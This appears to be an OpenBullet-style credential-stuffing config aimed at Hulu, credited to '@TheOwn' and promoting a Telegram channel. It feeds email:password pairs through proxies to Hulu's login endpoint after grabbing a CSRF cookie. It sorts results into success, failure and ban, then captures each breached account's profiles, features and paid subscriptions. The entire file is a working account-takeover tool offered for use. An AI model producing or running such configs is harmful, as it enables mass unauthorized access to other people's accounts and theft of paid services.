[SETTINGS]
{
  "Name": "Hulu",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2020-09-13T18:10:01.5765748+04:30",
  "AdditionalInfo": "Telegram Channel: T.me/BruteForce | Capture | Move Free To Custom | CPM Rate: 100-1500",
  "RequiredPlugins": [],
  "Author": "@TheOwn",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#GetCSRF REQUEST GET "https://secure.hulu.com/api/3.0/generate_csrf_value?for_hoth=true&path=/v2/web/password/authenticate" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#csrf PARSE "<COOKIES(_tcv)>" LR "" "" -> VAR "csrf" 

#Post REQUEST POST "https://auth.hulu.com/v2/web/password/authenticate" 
  CONTENT "csrf=<csrf>&user_email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{}" 
  KEYCHAIN Failure OR 
    KEY "Your login is invalid" 
  KEYCHAIN Ban OR 
    KEY "retry_limit" 

#GetCap REQUEST GET "https://home.hulu.com/v1/users/self" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Profiles PARSE "<SOURCE>" JSON "name" Recursive=TRUE -> CAP "Profiles" 

#KIR PARSE "<SOURCE>" LR "\"feature_ids\":[" "]" -> VAR "KIR" "[" "]" 

#Sub PARSE "<SOURCE>" LR "\"package_ids\":[" "]" -> VAR "Sub" "[" "]" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"package_ids\":[]" 

#Features FUNCTION Translate StopAfterFirstMatch=FALSE 
  KEY "1" VALUE "Noah" 
  KEY "2" VALUE "Unlimited Screens" 
  KEY "3" VALUE "Enhanced Cloud" 
  KEY "4" VALUE "PSL" 
  KEY "5" VALUE "Multi Stream" 
  KEY "6" VALUE "Live Stream" 
  KEY "7" VALUE "Lunchbox" 
  "<KIR>" -> CAP "Features" 

#Subscriptions FUNCTION Translate StopAfterFirstMatch=FALSE 
  KEY "14" VALUE "No Commercials" 
  KEY "15" VALUE "Showtime" 
  KEY "16" VALUE "Live TV" 
  KEY "17" VALUE "HBO" 
  KEY "18" VALUE "Cinemax" 
  KEY "19" VALUE "Starz" 
  KEY "21" VALUE "Entertainment" 
  KEY "23" VALUE "Spanish Add-on" 
  "<Sub>" -> CAP "Subscriptions" 
  
  #CC FUNCTION Constant " T.me/BruteForce " -> CAP "Telegram Channel:" 

